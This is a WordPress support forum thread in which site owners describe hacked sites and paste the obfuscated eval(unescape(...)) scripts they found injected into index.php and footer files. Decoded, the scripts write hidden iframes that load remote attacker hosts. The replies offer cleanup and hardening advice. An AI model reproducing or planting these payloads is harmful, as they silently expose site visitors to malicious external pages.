Title: harffull codes (eval( unescape( “function check_%)
Last modified: August 19, 2016

---

# harffull codes (eval( unescape( “function check_%)

 *  [samsun55](https://wordpress.org/support/users/samsun55/)
 * (@samsun55)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/harffull-codes-eval-unescape-function-check_/)
 * hello, in some web site I designed, I have a problem follow as, these codes are
   inserted into my web pages? What can I solve this problem, thanks….
    <!– /ad –
   ><Script> <!– var d=document; eval( unescape( “%66%75%6e%63%74%69%6f%6e%20%63%
   68%65%63%6b%5f%63%6f%6e%74%65%6e%74%28%29%7b%20%76%61%72%20%69%20%3d%20%30%3b%
   77%68%69%6c%65%28%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%
   42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%2e%6c%65%6e%67%74%68%
   29%7b%76%61%72%20%65%6c%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%
   6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%5b%69%
   5d%3b%69%66%28%20%28%65%6c%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d%3d%27%
   6e%6f%6e%65%27%20%7c%7c%20%65%6c%2e%73%74%79%6c%65%2e%76%69%73%69%62%69%6c%69%
   74%79%20%3d%3d%27%68%69%64%64%65%6e%27%20%7c%7c%20%28%65%6c%2e%77%69%64%74%68%
   3c%35%20&&%20%65%6c%2e%68%65%69%67%68%74%3c%35%29%29%20&&%20%65%6c%2e%6e%61%6d%
   65%21%3d%27%63%31%27%20%29%20%7b%65%6c%2e%70%61%72%65%6e%74%4e%6f%64%65%2e%72%
   65%6d%6f%76%65%43%68%69%6c%64%28%65%6c%29%3b%7d%20%65%6c%73%65%20%69%2b%2b%3b%
   7d%7d%63%68%65%63%6b%5f%63%6f%6e%74%65%6e%74%28%29%3b%0d%0a%69%66%20%28%21%6d%
   79%69%61%29%20%7b%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%
   6d%65%3d%63%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6d%79%2d%70%61%67%65%
   2d%64%65%2e%69%6e%66%6f%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%
   75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%38%36%32%39%32%29%2b%27%
   39%63%36%34%32%34%5c%27%20%77%69%64%74%68%3d%31%35%33%20%68%65%69%67%68%74%3d%
   35%36%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%
   27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%7d%76%61%72%20%6d%79%69%61%3d%74%
   72%75%65%3b” )); var c1439772935; //–> </Script>

Viewing 10 replies - 1 through 10 (of 10 total)

 *  [planningqueen](https://wordpress.org/support/users/planningqueen/)
 * (@planningqueen)
 * [18 years ago](https://wordpress.org/support/topic/harffull-codes-eval-unescape-function-check_/#post-735880)
 * I have the same error as well which would have occurred at about the same time.
   Have you found a solution?
 *  [marsie](https://wordpress.org/support/users/marsie/)
 * (@marsie)
 * [18 years ago](https://wordpress.org/support/topic/harffull-codes-eval-unescape-function-check_/#post-735897)
 * Same issue here. I have been searching online for a total solution to removing
   this from my WordPress installation. This has happened to me once before — and
   the malware code was in my footer.php file. I’m annoyed because it came back…
   Not sure why or how! Can anyone help?
 * This is the code appended after my closing </body> tag:
 * <script>eval(unescape(“%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%
   65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%
   20%6e%61%6d%65%3d%34%64%30%38%34%65%37%30%64%62%62%20%73%72%63%3d%5c%27%68%74%
   74%70%3a%2f%2f%35%38%2e%36%35%2e%32%33%32%2e%33%33%2f%67%70%61%63%6b%2f%69%6e%
   64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%
   72%61%6e%64%6f%6d%28%29%2a%31%36%33%36%30%30%29%2b%27%39%61%62%34%38%34%63%62%
   31%36%5c%27%20%77%69%64%74%68%3d%34%30%30%20%68%65%69%67%68%74%3d%34%30%39%20%
   73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%
   69%66%72%61%6d%65%3e%27%29”)); </script>
    <script>eval(unescape(“%77%69%6e%64%
   6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%
   77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%39%35%66%38%32%20%
   73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%35%38%2e%36%35%2e%32%33%32%2e%33%33%2f%
   67%70%61%63%6b%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%
   6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%37%33%37%38%29%2b%27%39%
   63%39%5c%27%20%77%69%64%74%68%3d%31%36%32%20%6
 *  [marsie](https://wordpress.org/support/users/marsie/)
 * (@marsie)
 * [18 years ago](https://wordpress.org/support/topic/harffull-codes-eval-unescape-function-check_/#post-735898)
 * Typo — I found the malicious code in both: index.php and wp-admin/index.php (
   not footer.php).
 *  [Michael Torbert](https://wordpress.org/support/users/hallsofmontezuma/)
 * (@hallsofmontezuma)
 * WordPress Virtuoso
 * [18 years ago](https://wordpress.org/support/topic/harffull-codes-eval-unescape-function-check_/#post-735899)
 * It’s compiled javascript. Often, WordPress theme designers will include it in
   their themes to keep you from removing credits or ads that they embed without
   your knowledge. It could also be the fruit of a malicious attack. Just remove
   it in your code, and then install the [security plugin](http://wordpress.org/extend/plugins/wp-security-scan/)
   for WordPress to help keep it from happening in the future.
 *  [marsie](https://wordpress.org/support/users/marsie/)
 * (@marsie)
 * [18 years ago](https://wordpress.org/support/topic/harffull-codes-eval-unescape-function-check_/#post-735900)
 * Update: I also found the damn code on every other index.php file in my entire
   server!
 * Additional corrupted files: wp-content/index.php, theme1/index.php, theme2/index.
   php (and every other theme index file).
 * I am manually deleting the malicious code on every file… But I still can’t figure
   out where this came from! I did some reading online and I am thinking it might
   be attributable to my SiteMeter counter (but am not positive).
 *  [marsie](https://wordpress.org/support/users/marsie/)
 * (@marsie)
 * [18 years ago](https://wordpress.org/support/topic/harffull-codes-eval-unescape-function-check_/#post-735901)
 * hey hallsofmontezuma, i’ll try the security plugin you suggested. thanks!
 *  [planningqueen](https://wordpress.org/support/users/planningqueen/)
 * (@planningqueen)
 * [18 years ago](https://wordpress.org/support/topic/harffull-codes-eval-unescape-function-check_/#post-735903)
 * hallsof montezuma. thanks for the advice – i had found the code and it was in
   my footer and once removed my feed became valid. i will also check out the security
   plug in.
 * I have another problem though in that my stats counter and wordpress stats are
   no longer working. this happened today but I made the changes to the footer on
   the weekend. could there be a link?
 *  Moderator [Samuel Wood (Otto)](https://wordpress.org/support/users/otto42/)
 * (@otto42)
 * WordPress.org Admin
 * [18 years ago](https://wordpress.org/support/topic/harffull-codes-eval-unescape-function-check_/#post-735905)
 * > _Update: I also found the damn code on every other index.php file in my entire
   > server!_
 * This indicates that somebody cracked into your server itself and ran some sort
   of script which added those lines everywhere it could find to add them.
 * WordPress security is only as good as the box’s own security.
 *  [cave-bit](https://wordpress.org/support/users/cave-bit/)
 * (@cave-bit)
 * [18 years ago](https://wordpress.org/support/topic/harffull-codes-eval-unescape-function-check_/#post-735908)
 * the problem is ever equal.Only admin inserted code in file width manage file 
   in admin page.
    If code change someone work…. See in your users-table (mysql)
   if exist phantom user…(width WordPress name for example……….)
 *  [nebhead](https://wordpress.org/support/users/nebhead/)
 * (@nebhead)
 * [17 years, 5 months ago](https://wordpress.org/support/topic/harffull-codes-eval-unescape-function-check_/#post-736101)
 * I also have this issue on my site. I discovered that all of my index.php files
   were modified. Anyone know if there are any rogue WP Plugins that may be suspect?

Viewing 10 replies - 1 through 10 (of 10 total)

The topic ‘harffull codes (eval( unescape( “function check_%)’ is closed to new 
replies.

## Tags

 * [categories](https://wordpress.org/support/topic-tag/categories/)
 * [exploit](https://wordpress.org/support/topic-tag/exploit/)
 * [hacked](https://wordpress.org/support/topic-tag/hacked/)
 * [hijacked](https://wordpress.org/support/topic-tag/hijacked/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 10 replies
 * 7 participants
 * Last reply from: [nebhead](https://wordpress.org/support/users/nebhead/)
 * Last activity: [17 years, 5 months ago](https://wordpress.org/support/topic/harffull-codes-eval-unescape-function-check_/#post-736101)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics